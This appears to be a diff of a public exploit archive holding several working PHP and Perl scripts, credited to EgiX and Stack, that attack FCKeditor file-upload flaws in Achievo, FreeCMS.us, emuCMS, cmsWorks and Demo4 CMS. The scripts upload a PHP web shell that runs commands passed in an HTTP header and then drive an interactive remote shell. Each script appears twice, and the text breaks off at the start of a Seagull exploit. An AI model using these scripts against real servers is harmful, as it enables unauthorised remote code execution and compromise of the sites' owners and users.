files containing malicious PHP code due to multiple file extensions isn't properly checked
*/
error_reporting(0);
set_time_limit(0);
ini_set("default_socket_timeout", 5);
function http_send($host, $packet)
{
$sock = fsockopen($host, 80);
while (!$sock)
{
print "\n[-] No response from {$host}:80 Trying again...";
$sock = fsockopen($host, 80);
}
fputs($sock, $packet);
while (!feof($sock)) $resp .= fread($sock, 1024);
fclose($sock);
return $resp;
}
function upload()
{
global $host, $path;
$connector = "atk/attributes/fck/editor/filemanager/browser/mcpuk/connectors/php/connector.php";
$file_ext = array("zip", "swf", "fla", "doc", "xls", "rtf", "csv");
foreach ($file_ext as $ext)
{
print "\n[-] Trying to upload with .{$ext} extension...";
$data = "--12345\r\n";
$data .= "Content-Disposition: form-data; name=\"NewFile\"; filename=\"sh.php.{$ext}\"\r\n";
$data .= "Content-Type: application/octet-stream\r\n\r\n";
$data .= "<?php \${print(_code_)}.\${passthru(base64_decode(\$_SERVER[HTTP_CMD]))}.\${print(_code_)} ?>\r\n";
$data .= "--12345--\r\n";
$packet = "POST {$path}{$connector}?Command=FileUpload&CurrentFolder={$path} HTTP/1.0\r\n";
$packet .= "Host: {$host}\r\n";
$packet .= "Content-Length: ".strlen($data)."\r\n";
$packet .= "Content-Type: multipart/form-data; boundary=12345\r\n";
$packet .= "Connection: close\r\n\r\n";
$packet .= $data;
preg_match("/OnUploadCompleted\((.*),'(.*)'\)/i", http_send($host, $packet), $html);
if (!in_array(intval($html[1]), array(0, 201))) die("\n[-] Upload failed! (Error {$html[1]}: {$html[2]})\n");
$packet = "GET {$path}sh.php.{$ext} HTTP/1.0\r\n";
$packet .= "Host: {$host}\r\n";
$packet .= "Connection: close\r\n\r\n";
$html = http_send($host, $packet);
if (!eregi("print", $html) and eregi("_code_", $html)) return $ext;
sleep(1);
}
return false;
}
print "\n+--------------------------------------------------------------------+";
print "\n| Achievo <= 1.3.2 (fckeditor) Arbitrary File Upload Exploit by EgiX |";
print "\n+--------------------------------------------------------------------+\n";
if ($argc < 3)
{
print "\nUsage......: php $argv[0] host path\n";
print "\nExample....: php $argv[0] localhost /";
print "\nExample....: php $argv[0] localhost /achievo/\n";
die();
}
$host = $argv[1];
$path = $argv[2];
if (!($ext = upload())) die("\n\n[-] Exploit failed...\n");
else print "\n[-] Shell uploaded...starting it!\n";
define(STDIN, fopen("php://stdin", "r"));
while(1)
{
print "\nachievo-shell# ";
$cmd = trim(fgets(STDIN));
if ($cmd != "exit")
{
$packet = "GET {$path}sh.php.{$ext} HTTP/1.0\r\n";
$packet.= "Host: {$host}\r\n";
$packet.= "Cmd: ".base64_encode($cmd)."\r\n";
$packet.= "Connection: close\r\n\r\n";
$html = http_send($host, $packet);
if (!eregi("_code_", $html)) die("\n[-] Exploit failed...\n");
$shell = explode("_code_", $html);
print "\n{$shell[1]}";
}
else break;
}
?>
# milw0rm.com [2008-06-09]
<?php
/*
-----------------------------------------------------------------
Achievo <= 1.3.2 (fckeditor) Remote Arbitrary File Upload Exploit
-----------------------------------------------------------------
author...: EgiX
mail.....: n0b0d13s[at]gmail[dot]com
link.....: http://www.achievo.org/
details..: works only with a specific server configuration (e.g. an Apache server with the mod_mime module installed)
[-] vulnerable code in /atk/attributes/fck/editor/filemanager/browser/mcpuk/connectors/php/config.php
121. //File Area
122. $fckphp_config['ResourceAreas']['File'] =array(
123.
124. //Files(identified by extension) that may be uploaded to this area
125. 'AllowedExtensions' => array("zip","doc","xls","pdf","rtf","csv","jpg","gif","jpeg","png","avi","mpg","mpeg","swf","fla"),
with a default configuration of this script, an attacker might be able to upload arbitrary
files containing malicious PHP code due to multiple file extensions isn't properly checked
*/
error_reporting(0);
set_time_limit(0);
ini_set("default_socket_timeout", 5);
function http_send($host, $packet)
{
$sock = fsockopen($host, 80);
while (!$sock)
{
print "\n[-] No response from {$host}:80 Trying again...";
$sock = fsockopen($host, 80);
}
fputs($sock, $packet);
while (!feof($sock)) $resp .= fread($sock, 1024);
fclose($sock);
return $resp;
}
function upload()
{
global $host, $path;
$connector = "atk/attributes/fck/editor/filemanager/browser/mcpuk/connectors/php/connector.php";
$file_ext = array("zip", "swf", "fla", "doc", "xls", "rtf", "csv");
foreach ($file_ext as $ext)
{
print "\n[-] Trying to upload with .{$ext} extension...";
$data = "--12345\r\n";
$data .= "Content-Disposition: form-data; name=\"NewFile\"; filename=\"sh.php.{$ext}\"\r\n";
$data .= "Content-Type: application/octet-stream\r\n\r\n";
$data .= "<?php \${print(_code_)}.\${passthru(base64_decode(\$_SERVER[HTTP_CMD]))}.\${print(_code_)} ?>\r\n";
$data .= "--12345--\r\n";
$packet = "POST {$path}{$connector}?Command=FileUpload&CurrentFolder={$path} HTTP/1.0\r\n";
$packet .= "Host: {$host}\r\n";
$packet .= "Content-Length: ".strlen($data)."\r\n";
$packet .= "Content-Type: multipart/form-data; boundary=12345\r\n";
$packet .= "Connection: close\r\n\r\n";
$packet .= $data;
preg_match("/OnUploadCompleted\((.*),'(.*)'\)/i", http_send($host, $packet), $html);
if (!in_array(intval($html[1]), array(0, 201))) die("\n[-] Upload failed! (Error {$html[1]}: {$html[2]})\n");
$packet = "GET {$path}sh.php.{$ext} HTTP/1.0\r\n";
$packet .= "Host: {$host}\r\n";
$packet .= "Connection: close\r\n\r\n";
$html = http_send($host, $packet);
if (!eregi("print", $html) and eregi("_code_", $html)) return $ext;
sleep(1);
}
return false;
}
print "\n+--------------------------------------------------------------------+";
print "\n| Achievo <= 1.3.2 (fckeditor) Arbitrary File Upload Exploit by EgiX |";
print "\n+--------------------------------------------------------------------+\n";
if ($argc < 3)
{
print "\nUsage......: php $argv[0] host path\n";
print "\nExample....: php $argv[0] localhost /";
print "\nExample....: php $argv[0] localhost /achievo/\n";
die();
}
$host = $argv[1];
$path = $argv[2];
if (!($ext = upload())) die("\n\n[-] Exploit failed...\n");
else print "\n[-] Shell uploaded...starting it!\n";
define(STDIN, fopen("php://stdin", "r"));
while(1)
{
print "\nachievo-shell# ";
$cmd = trim(fgets(STDIN));
if ($cmd != "exit")
{
$packet = "GET {$path}sh.php.{$ext} HTTP/1.0\r\n";
$packet.= "Host: {$host}\r\n";
$packet.= "Cmd: ".base64_encode($cmd)."\r\n";
$packet.= "Connection: close\r\n\r\n";
$html = http_send($host, $packet);
if (!eregi("_code_", $html)) die("\n[-] Exploit failed...\n");
$shell = explode("_code_", $html);
print "\n{$shell[1]}";
}
else break;
}
?>
# milw0rm.com [2008-06-09]


@ -1,73 +1,73 @@
<?php
/*
--------------------------------------------------------------
FreeCMS.us 0.2 (fckeditor) Arbitrary File Upload Exploit
--------------------------------------------------------------
By : Stack
Special thnx for : Egix
[-] vulnerable code in /[path]/admin/fckeditor/editor/filemanager/upload/php/upload.php
with a default configuration of this script, an attacker might be able to upload arbitrary files containing malicious PHP code
*/
error_reporting(0);
set_time_limit(0);
ini_set("default_socket_timeout", 5);
function http_send($host, $packet)
{
$sock = fsockopen($host, 80);
while (!$sock)
{
print "\n[-] No response from {$host}:80 Trying again...";
$sock = fsockopen($host, 80);
}
fputs($sock, $packet);
while (!feof($sock)) $resp .= fread($sock, 1024);
fclose($sock);
return $resp;
}
print "\n+------------------------------------------------------------+";
print "\n|File Upload Exploit by Stack |";
print "\n+------------------------------------------------------------+\n";
if ($argc < 2)
{
print "\nUsage......: php $argv[0] host path";
print "\nExample....: php $argv[0] localhost /booking_calendar/\n";
die();
}
$host = $argv[1];
$path = $argv[2];
$data = "--12345\r\n";
$data .= "Content-Disposition: form-data; name=\"NewFile\"; filename=\"s.php.he.ll\"\r\n";
$data .= "Content-Type: application/octet-stream\r\n\r\n";
$data .= "<?php \${print(_code_)}.\${passthru(base64_decode(\$_SERVER[HTTP_CMD]))}.\${print(_code_)} ?>\n";
$data .= "--12345--\r\n";
$packet = "POST {$path}/fckeditor/editor/filemanager/upload/php/upload.php HTTP/1.0\r\n";
$packet .= "Host: {$host}\r\n";
$packet .= "Content-Length: ".strlen($data)."\r\n";
$packet .= "Content-Type: multipart/form-data; boundary=12345\r\n";
$packet .= "Connection: close\r\n\r\n";
$packet .= $data;
preg_match("/OnUploadCompleted\((.*),\"(.*)\",\"(.*)\",/i", http_send($host, $packet), $html);
if (!in_array(intval($html[1]), array(0, 201))) die("\n[-] Upload failed! (Error {$html[1]})\n");
else print "\n[-] Shell uploaded to {$html[2]}...starting it!\n";
define(STDIN, fopen("php://stdin", "r"));
while(1)
{
print "\nstack-shell# ";
$cmd = trim(fgets(STDIN));
if ($cmd != "exit")
{
$packet = "GET {$path}datacenter/media/{$html[3]} HTTP/1.0\r\n";
$packet.= "Host: {$host}\r\n";
$packet.= "Cmd: ".base64_encode($cmd)."\r\n";
$packet.= "Connection: close\r\n\r\n";
$output = http_send($host, $packet);
if (eregi("print", $output) || !eregi("_code_", $output)) die("\n[-] Exploit failed...\n");
$shell = explode("_code_", $output);
print "\n{$shell[1]}";
}
else break;
}
?>
# milw0rm.com [2008-06-17]
<?php
/*
--------------------------------------------------------------
FreeCMS.us 0.2 (fckeditor) Arbitrary File Upload Exploit
--------------------------------------------------------------
By : Stack
Special thnx for : Egix
[-] vulnerable code in /[path]/admin/fckeditor/editor/filemanager/upload/php/upload.php
with a default configuration of this script, an attacker might be able to upload arbitrary files containing malicious PHP code
*/
error_reporting(0);
set_time_limit(0);
ini_set("default_socket_timeout", 5);
function http_send($host, $packet)
{
$sock = fsockopen($host, 80);
while (!$sock)
{
print "\n[-] No response from {$host}:80 Trying again...";
$sock = fsockopen($host, 80);
}
fputs($sock, $packet);
while (!feof($sock)) $resp .= fread($sock, 1024);
fclose($sock);
return $resp;
}
print "\n+------------------------------------------------------------+";
print "\n|File Upload Exploit by Stack |";
print "\n+------------------------------------------------------------+\n";
if ($argc < 2)
{
print "\nUsage......: php $argv[0] host path";
print "\nExample....: php $argv[0] localhost /booking_calendar/\n";
die();
}
$host = $argv[1];
$path = $argv[2];
$data = "--12345\r\n";
$data .= "Content-Disposition: form-data; name=\"NewFile\"; filename=\"s.php.he.ll\"\r\n";
$data .= "Content-Type: application/octet-stream\r\n\r\n";
$data .= "<?php \${print(_code_)}.\${passthru(base64_decode(\$_SERVER[HTTP_CMD]))}.\${print(_code_)} ?>\n";
$data .= "--12345--\r\n";
$packet = "POST {$path}/fckeditor/editor/filemanager/upload/php/upload.php HTTP/1.0\r\n";
$packet .= "Host: {$host}\r\n";
$packet .= "Content-Length: ".strlen($data)."\r\n";
$packet .= "Content-Type: multipart/form-data; boundary=12345\r\n";
$packet .= "Connection: close\r\n\r\n";
$packet .= $data;
preg_match("/OnUploadCompleted\((.*),\"(.*)\",\"(.*)\",/i", http_send($host, $packet), $html);
if (!in_array(intval($html[1]), array(0, 201))) die("\n[-] Upload failed! (Error {$html[1]})\n");
else print "\n[-] Shell uploaded to {$html[2]}...starting it!\n";
define(STDIN, fopen("php://stdin", "r"));
while(1)
{
print "\nstack-shell# ";
$cmd = trim(fgets(STDIN));
if ($cmd != "exit")
{
$packet = "GET {$path}datacenter/media/{$html[3]} HTTP/1.0\r\n";
$packet.= "Host: {$host}\r\n";
$packet.= "Cmd: ".base64_encode($cmd)."\r\n";
$packet.= "Connection: close\r\n\r\n";
$output = http_send($host, $packet);
if (eregi("print", $output) || !eregi("_code_", $output)) die("\n[-] Exploit failed...\n");
$shell = explode("_code_", $output);
print "\n{$shell[1]}";
}
else break;
}
?>
# milw0rm.com [2008-06-17]


@ -1,29 +1,29 @@
#!/usr/bin/perl
use strict;
use warnings;
use LWP::UserAgent;
use HTTP::Request::Common;
print <<INTRO;
+++++++++++++++++++++++++++++++++++++++++++++++++++++
+emuCMS 0.3 (fckeditor) Arbitrary File Upload xpl +
+ +
+ By: Stack +
+++++++++++++++++++++++++++++++++++++++++++++++++++++
# t0pP8uZz
INTRO
print "Enter URL(ie: http://site.com): ";
chomp(my $url=<STDIN>);
print "Enter File Path(path to local file to upload): ";
chomp(my $file=<STDIN>);
my $ua = LWP::UserAgent->new;
my $re = $ua->request(POST $url.'/admin/FCKeditor/editor/filemanager/upload/php/upload.php',
Content_Type => 'form-data',
Content => [ NewFile => $file ] );
if($re->is_success) {
if( index($re->content, "Disabled") != -1 ) { print "Exploit Successfull! File Uploaded!\n"; }
else { print "File Upload Is Disabled! Failed!\n"; }
} else { print "HTTP Request Failed!\n"; }
exit;
# milw0rm.com [2008-06-23]
#!/usr/bin/perl
use strict;
use warnings;
use LWP::UserAgent;
use HTTP::Request::Common;
print <<INTRO;
+++++++++++++++++++++++++++++++++++++++++++++++++++++
+emuCMS 0.3 (fckeditor) Arbitrary File Upload xpl +
+ +
+ By: Stack +
+++++++++++++++++++++++++++++++++++++++++++++++++++++
# t0pP8uZz
INTRO
print "Enter URL(ie: http://site.com): ";
chomp(my $url=<STDIN>);
print "Enter File Path(path to local file to upload): ";
chomp(my $file=<STDIN>);
my $ua = LWP::UserAgent->new;
my $re = $ua->request(POST $url.'/admin/FCKeditor/editor/filemanager/upload/php/upload.php',
Content_Type => 'form-data',
Content => [ NewFile => $file ] );
if($re->is_success) {
if( index($re->content, "Disabled") != -1 ) { print "Exploit Successfull! File Uploaded!\n"; }
else { print "File Upload Is Disabled! Failed!\n"; }
} else { print "HTTP Request Failed!\n"; }
exit;
# milw0rm.com [2008-06-23]


@ -1,112 +1,112 @@
<?php
/*
-----------------------------------------------------------------
cmsWorks 2.2 RC4 (fckeditor) Remote Arbitrary File Upload Exploit
-----------------------------------------------------------------
discovered by Stack
exploited by ..: EgiX
special thnx to EgiX
details..: works only with a specific server configuration (e.g. an Apache server with the mod_mime module installed)
[-] vulnerable code in path/admin/include/FCKeditor/editor/filemanager/browser/mcpuk/connectors/php/config.php
121. //File Area
122. $fckphp_config['ResourceAreas']['File'] =array(
123.
124. //Files(identified by extension) that may be uploaded to this area
125. 'AllowedExtensions' => array("zip","doc","xls","pdf","rtf","csv","jpg","gif","jpeg","png","avi","mpg","mpeg","swf","fla"),
with a default configuration of this script, an attacker might be able to upload arbitrary
files containing malicious PHP code due to multiple file extensions isn't properly checked
*/
error_reporting(0);
set_time_limit(0);
ini_set("default_socket_timeout", 5);
function http_send($host, $packet)
{
$sock = fsockopen($host, 80);
while (!$sock)
{
print "\n[-] No response from {$host}:80 Trying again...";
$sock = fsockopen($host, 80);
}
fputs($sock, $packet);
while (!feof($sock)) $resp .= fread($sock, 1024);
fclose($sock);
return $resp;
}
function upload()
{
global $host, $path;
$connector = "/admin/include/FCKeditor/editor/filemanager/browser/mcpuk/connectors/php/config.php";
$file_ext = array("zip", "swf", "fla", "doc", "xls", "rtf", "csv");
foreach ($file_ext as $ext)
{
print "\n[-] Trying to upload with .{$ext} extension...";
$data = "--12345\r\n";
$data .= "Content-Disposition: form-data; name=\"NewFile\"; filename=\"sh.php.{$ext}\"\r\n";
$data .= "Content-Type: application/octet-stream\r\n\r\n";
$data .= "<?php \${print(_code_)}.\${passthru(base64_decode(\$_SERVER[HTTP_CMD]))}.\${print(_code_)} ?>\r\n";
$data .= "--12345--\r\n";
$packet = "POST {$path}{$connector}?Command=FileUpload&CurrentFolder={$path} HTTP/1.0\r\n";
$packet .= "Host: {$host}\r\n";
$packet .= "Content-Length: ".strlen($data)."\r\n";
$packet .= "Content-Type: multipart/form-data; boundary=12345\r\n";
$packet .= "Connection: close\r\n\r\n";
$packet .= $data;
preg_match("/OnUploadCompleted\((.*),'(.*)'\)/i", http_send($host, $packet), $html);
if (!in_array(intval($html[1]), array(0, 201))) die("\n[-] Upload failed! (Error {$html[1]}: {$html[2]})\n");
$packet = "GET {$path}sh.php.{$ext} HTTP/1.0\r\n";
$packet .= "Host: {$host}\r\n";
$packet .= "Connection: close\r\n\r\n";
$html = http_send($host, $packet);
if (!eregi("print", $html) and eregi("_code_", $html)) return $ext;
sleep(1);
}
return false;
}
print "\n+--------------------------------------------------------------------+";
print "\n| cmsWorks 2.2 RC4 (fckeditor) Remote Arbitrary File Upload Exploit |";
print "\n+--------------------------------------------------------------------+\n";
if ($argc < 3)
{
print "\nUsage......: php $argv[0] host path\n";
print "\nExample....: php $argv[0] localhost /";
print "\nExample....: php $argv[0] localhost /achievo/\n";
die();
}
$host = $argv[1];
$path = $argv[2];
if (!($ext = upload())) die("\n\n[-] Exploit failed...\n");
else print "\n[-] Shell uploaded...starting it!\n";
define(STDIN, fopen("php://stdin", "r"));
while(1)
{
print "\nStack-shell# ";
$cmd = trim(fgets(STDIN));
if ($cmd != "exit")
{
$packet = "GET {$path}sh.php.{$ext} HTTP/1.0\r\n";
$packet.= "Host: {$host}\r\n";
$packet.= "Cmd: ".base64_encode($cmd)."\r\n";
$packet.= "Connection: close\r\n\r\n";
$html = http_send($host, $packet);
if (!eregi("_code_", $html)) die("\n[-] Exploit failed...\n");
$shell = explode("_code_", $html);
print "\n{$shell[1]}";
}
else break;
}
?>
# milw0rm.com [2008-06-23]
<?php
/*
-----------------------------------------------------------------
cmsWorks 2.2 RC4 (fckeditor) Remote Arbitrary File Upload Exploit
-----------------------------------------------------------------
discovered by Stack
exploited by ..: EgiX
special thnx to EgiX
details..: works only with a specific server configuration (e.g. an Apache server with the mod_mime module installed)
[-] vulnerable code in path/admin/include/FCKeditor/editor/filemanager/browser/mcpuk/connectors/php/config.php
121. //File Area
122. $fckphp_config['ResourceAreas']['File'] =array(
123.
124. //Files(identified by extension) that may be uploaded to this area
125. 'AllowedExtensions' => array("zip","doc","xls","pdf","rtf","csv","jpg","gif","jpeg","png","avi","mpg","mpeg","swf","fla"),
with a default configuration of this script, an attacker might be able to upload arbitrary
files containing malicious PHP code due to multiple file extensions isn't properly checked
*/
error_reporting(0);
set_time_limit(0);
ini_set("default_socket_timeout", 5);
function http_send($host, $packet)
{
$sock = fsockopen($host, 80);
while (!$sock)
{
print "\n[-] No response from {$host}:80 Trying again...";
$sock = fsockopen($host, 80);
}
fputs($sock, $packet);
while (!feof($sock)) $resp .= fread($sock, 1024);
fclose($sock);
return $resp;
}
function upload()
{
global $host, $path;
$connector = "/admin/include/FCKeditor/editor/filemanager/browser/mcpuk/connectors/php/config.php";
$file_ext = array("zip", "swf", "fla", "doc", "xls", "rtf", "csv");
foreach ($file_ext as $ext)
{
print "\n[-] Trying to upload with .{$ext} extension...";
$data = "--12345\r\n";
$data .= "Content-Disposition: form-data; name=\"NewFile\"; filename=\"sh.php.{$ext}\"\r\n";
$data .= "Content-Type: application/octet-stream\r\n\r\n";
$data .= "<?php \${print(_code_)}.\${passthru(base64_decode(\$_SERVER[HTTP_CMD]))}.\${print(_code_)} ?>\r\n";
$data .= "--12345--\r\n";
$packet = "POST {$path}{$connector}?Command=FileUpload&CurrentFolder={$path} HTTP/1.0\r\n";
$packet .= "Host: {$host}\r\n";
$packet .= "Content-Length: ".strlen($data)."\r\n";
$packet .= "Content-Type: multipart/form-data; boundary=12345\r\n";
$packet .= "Connection: close\r\n\r\n";
$packet .= $data;
preg_match("/OnUploadCompleted\((.*),'(.*)'\)/i", http_send($host, $packet), $html);
if (!in_array(intval($html[1]), array(0, 201))) die("\n[-] Upload failed! (Error {$html[1]}: {$html[2]})\n");
$packet = "GET {$path}sh.php.{$ext} HTTP/1.0\r\n";
$packet .= "Host: {$host}\r\n";
$packet .= "Connection: close\r\n\r\n";
$html = http_send($host, $packet);
if (!eregi("print", $html) and eregi("_code_", $html)) return $ext;
sleep(1);
}
return false;
}
print "\n+--------------------------------------------------------------------+";
print "\n| cmsWorks 2.2 RC4 (fckeditor) Remote Arbitrary File Upload Exploit |";
print "\n+--------------------------------------------------------------------+\n";
if ($argc < 3)
{
print "\nUsage......: php $argv[0] host path\n";
print "\nExample....: php $argv[0] localhost /";
print "\nExample....: php $argv[0] localhost /achievo/\n";
die();
}
$host = $argv[1];
$path = $argv[2];
if (!($ext = upload())) die("\n\n[-] Exploit failed...\n");
else print "\n[-] Shell uploaded...starting it!\n";
define(STDIN, fopen("php://stdin", "r"));
while(1)
{
print "\nStack-shell# ";
$cmd = trim(fgets(STDIN));
if ($cmd != "exit")
{
$packet = "GET {$path}sh.php.{$ext} HTTP/1.0\r\n";
$packet.= "Host: {$host}\r\n";
$packet.= "Cmd: ".base64_encode($cmd)."\r\n";
$packet.= "Connection: close\r\n\r\n";
$html = http_send($host, $packet);
if (!eregi("_code_", $html)) die("\n[-] Exploit failed...\n");
$shell = explode("_code_", $html);
print "\n{$shell[1]}";
}
else break;
}
?>
# milw0rm.com [2008-06-23]


@ -1,136 +1,136 @@
<?php
/*
--------------------------------------------------------------
Demo4 CMS Beta01 (fckeditor) Arbitrary File Upload
--------------------------------------------------------------
by Stack
Special thnx for : Egix
[-] vulnerable code in /[path]/fckeditor/editor/filemanager/upload/php/upload.php
41. // Get the posted file.
42. $oFile = $_FILES['NewFile'] ;
43.
44. // Get the uploaded file name and extension.
45. $sFileName = $oFile['name'] ;
46. $sOriginalFileName = $sFileName ;
47. $sExtension = substr( $sFileName, ( strrpos($sFileName, '.') + 1 ) ) ;
48. $sExtension = strtolower( $sExtension ) ;
49.
50. // The the file type (from the QueryString, by default 'File').
51. $sType = isset( $_GET['Type'] ) ? $_GET['Type'] : 'File' ;
52.
53. // Check if it is an allowed type.
54. if ( !in_array( $sType, array('File','Image','Flash','Media') ) )
55. SendResults( 1, '', '', 'Invalid type specified' ) ;
56.
57. // Get the allowed and denied extensions arrays.
58. $arAllowed = $Config['AllowedExtensions'][$sType] ;
59. $arDenied = $Config['DeniedExtensions'][$sType] ;
60.
61. // Check if it is an allowed extension.
62. if ( ( count($arAllowed) > 0 && !in_array( $sExtension, $arAllowed ) ) || ( count($arDenied) > 0 && in_array( $sExtension, $arDenied ) ) )
63. SendResults( '202' ) ;
64.
65. $sErrorNumber = '0' ;
66. $sFileUrl = '' ;
67.
68. // Initializes the counter used to rename the file, if another one with the same name already exists.
69. $iCounter = 0 ;
70.
71. // The the target directory.
72. if ( isset( $Config['UserFilesAbsolutePath'] ) )
73. $sServerDir = $Config['UserFilesAbsolutePath'] ;
74. else
75. //$sServerDir = GetRootPath() . $Config["UserFilesPath"] ;
76. $sServerDir = $Config["UserFilesPath"] ;
77.
78. while ( true )
79. {
80. // Compose the file path.
81. $sFilePath = $sServerDir . $sFileName ;
82.
83. // If a file with that name already exists.
84. if ( is_file( $sFilePath ) )
85. {
86. $iCounter++ ;
87. $sFileName = RemoveExtension( $sOriginalFileName ) . '(' . $iCounter . ').' . $sExtension ;
88. $sErrorNumber = '201' ;
89. }
90. else
91. {
92. move_uploaded_file( $oFile['tmp_name'], $sFilePath ) ;
93.
94. if ( is_file( $sFilePath ) )
95. {
96. $oldumask = umask(0) ;
97. chmod( $sFilePath, 0777 ) ;
98. umask( $oldumask ) ;
99. }
100.
101. $sFileUrl = $Config["UserFilesPath"] . $sFileName ;
102.
103. break ;
*/
error_reporting(0);
set_time_limit(0);
ini_set("default_socket_timeout", 5);
function http_send($host, $packet)
{
$sock = fsockopen($host, 80);
while (!$sock)
{
print "\n[-] No response from {$host}:80 Trying again...";
$sock = fsockopen($host, 80);
}
fputs($sock, $packet);
while (!feof($sock)) $resp .= fread($sock, 1024);
fclose($sock);
return $resp;
}
print "\n+------------------------------------------------------------+";
print "\n|Demo4 CMS Beta01 (fckeditor) Arbitrary File Upload Exploit by Stack |";
print "\n+------------------------------------------------------------+\n";
if ($argc < 2)
{
print "\nUsage......: php $argv[0] host path";
print "\nExample....: php $argv[0] localhost /booking_calendar/\n";
die();
}
$host = $argv[1];
$path = $argv[2];
$data = "--12345\r\n";
$data .= "Content-Disposition: form-data; name=\"NewFile\"; filename=\"s.php.he.ll\"\r\n";
$data .= "Content-Type: application/octet-stream\r\n\r\n";
$data .= "<?php \${print(_code_)}.\${passthru(base64_decode(\$_SERVER[HTTP_CMD]))}.\${print(_code_)} ?>\n";
$data .= "--12345--\r\n";
$packet = "POST {$path}/fckeditor/editor/filemanager/upload/php/upload.php HTTP/1.0\r\n";
$packet .= "Host: {$host}\r\n";
$packet .= "Content-Length: ".strlen($data)."\r\n";
$packet .= "Content-Type: multipart/form-data; boundary=12345\r\n";
$packet .= "Connection: close\r\n\r\n";
$packet .= $data;
preg_match("/OnUploadCompleted\((.*),\"(.*)\",\"(.*)\",/i", http_send($host, $packet), $html);
if (!in_array(intval($html[1]), array(0, 201))) die("\n[-] Upload failed! (Error {$html[1]})\n");
else print "\n[-] Shell uploaded to {$html[2]}...starting it!\n";
define(STDIN, fopen("php://stdin", "r"));
while(1)
{
print "\nstack-shell# ";
$cmd = trim(fgets(STDIN));
if ($cmd != "exit")
{
$packet = "GET {$path}datacenter/media/{$html[3]} HTTP/1.0\r\n";
$packet.= "Host: {$host}\r\n";
$packet.= "Cmd: ".base64_encode($cmd)."\r\n";
$packet.= "Connection: close\r\n\r\n";
$output = http_send($host, $packet);
if (eregi("print", $output) || !eregi("_code_", $output)) die("\n[-] Exploit failed...\n");
$shell = explode("_code_", $output);
print "\n{$shell[1]}";
}
else break;
}
?>
# milw0rm.com [2008-06-23]
<?php
/*
--------------------------------------------------------------
Demo4 CMS Beta01 (fckeditor) Arbitrary File Upload
--------------------------------------------------------------
by Stack
Special thnx for : Egix
[-] vulnerable code in /[path]/fckeditor/editor/filemanager/upload/php/upload.php
41. // Get the posted file.
42. $oFile = $_FILES['NewFile'] ;
43.
44. // Get the uploaded file name and extension.
45. $sFileName = $oFile['name'] ;
46. $sOriginalFileName = $sFileName ;
47. $sExtension = substr( $sFileName, ( strrpos($sFileName, '.') + 1 ) ) ;
48. $sExtension = strtolower( $sExtension ) ;
49.
50. // The the file type (from the QueryString, by default 'File').
51. $sType = isset( $_GET['Type'] ) ? $_GET['Type'] : 'File' ;
52.
53. // Check if it is an allowed type.
54. if ( !in_array( $sType, array('File','Image','Flash','Media') ) )
55. SendResults( 1, '', '', 'Invalid type specified' ) ;
56.
57. // Get the allowed and denied extensions arrays.
58. $arAllowed = $Config['AllowedExtensions'][$sType] ;
59. $arDenied = $Config['DeniedExtensions'][$sType] ;
60.
61. // Check if it is an allowed extension.
62. if ( ( count($arAllowed) > 0 && !in_array( $sExtension, $arAllowed ) ) || ( count($arDenied) > 0 && in_array( $sExtension, $arDenied ) ) )
63. SendResults( '202' ) ;
64.
65. $sErrorNumber = '0' ;
66. $sFileUrl = '' ;
67.
68. // Initializes the counter used to rename the file, if another one with the same name already exists.
69. $iCounter = 0 ;
70.
71. // The the target directory.
72. if ( isset( $Config['UserFilesAbsolutePath'] ) )
73. $sServerDir = $Config['UserFilesAbsolutePath'] ;
74. else
75. //$sServerDir = GetRootPath() . $Config["UserFilesPath"] ;
76. $sServerDir = $Config["UserFilesPath"] ;
77.
78. while ( true )
79. {
80. // Compose the file path.
81. $sFilePath = $sServerDir . $sFileName ;
82.
83. // If a file with that name already exists.
84. if ( is_file( $sFilePath ) )
85. {
86. $iCounter++ ;
87. $sFileName = RemoveExtension( $sOriginalFileName ) . '(' . $iCounter . ').' . $sExtension ;
88. $sErrorNumber = '201' ;
89. }
90. else
91. {
92. move_uploaded_file( $oFile['tmp_name'], $sFilePath ) ;
93.
94. if ( is_file( $sFilePath ) )
95. {
96. $oldumask = umask(0) ;
97. chmod( $sFilePath, 0777 ) ;
98. umask( $oldumask ) ;
99. }
100.
101. $sFileUrl = $Config["UserFilesPath"] . $sFileName ;
102.
103. break ;
*/
error_reporting(0);
set_time_limit(0);
ini_set("default_socket_timeout", 5);
function http_send($host, $packet)
{
$sock = fsockopen($host, 80);
while (!$sock)
{
print "\n[-] No response from {$host}:80 Trying again...";
$sock = fsockopen($host, 80);
}
fputs($sock, $packet);
while (!feof($sock)) $resp .= fread($sock, 1024);
fclose($sock);
return $resp;
}
print "\n+------------------------------------------------------------+";
print "\n|Demo4 CMS Beta01 (fckeditor) Arbitrary File Upload Exploit by Stack |";
print "\n+------------------------------------------------------------+\n";
if ($argc < 2)
{
print "\nUsage......: php $argv[0] host path";
print "\nExample....: php $argv[0] localhost /booking_calendar/\n";
die();
}
$host = $argv[1];
$path = $argv[2];
$data = "--12345\r\n";
$data .= "Content-Disposition: form-data; name=\"NewFile\"; filename=\"s.php.he.ll\"\r\n";
$data .= "Content-Type: application/octet-stream\r\n\r\n";
$data .= "<?php \${print(_code_)}.\${passthru(base64_decode(\$_SERVER[HTTP_CMD]))}.\${print(_code_)} ?>\n";
$data .= "--12345--\r\n";
$packet = "POST {$path}/fckeditor/editor/filemanager/upload/php/upload.php HTTP/1.0\r\n";
$packet .= "Host: {$host}\r\n";
$packet .= "Content-Length: ".strlen($data)."\r\n";
$packet .= "Content-Type: multipart/form-data; boundary=12345\r\n";
$packet .= "Connection: close\r\n\r\n";
$packet .= $data;
preg_match("/OnUploadCompleted\((.*),\"(.*)\",\"(.*)\",/i", http_send($host, $packet), $html);
if (!in_array(intval($html[1]), array(0, 201))) die("\n[-] Upload failed! (Error {$html[1]})\n");
else print "\n[-] Shell uploaded to {$html[2]}...starting it!\n";
define(STDIN, fopen("php://stdin", "r"));
while(1)
{
print "\nstack-shell# ";
$cmd = trim(fgets(STDIN));
if ($cmd != "exit")
{
$packet = "GET {$path}datacenter/media/{$html[3]} HTTP/1.0\r\n";
$packet.= "Host: {$host}\r\n";
$packet.= "Cmd: ".base64_encode($cmd)."\r\n";
$packet.= "Connection: close\r\n\r\n";
$output = http_send($host, $packet);
if (eregi("print", $output) || !eregi("_code_", $output)) die("\n[-] Exploit failed...\n");
$shell = explode("_code_", $output);
print "\n{$shell[1]}";
}
else break;
}
?>
# milw0rm.com [2008-06-23]


@ -1,117 +1,117 @@
<?php
/*
------------------------------------------------------------------------
Seagull PHP Framework <= 0.6.4 (fckeditor) Arbitrary File Upload Exploit
------------------------------------------------------------------------
author...: EgiX
mail.....: n0b0d13s[at]gmail[dot]com
link.....: http://seagullproject.org/
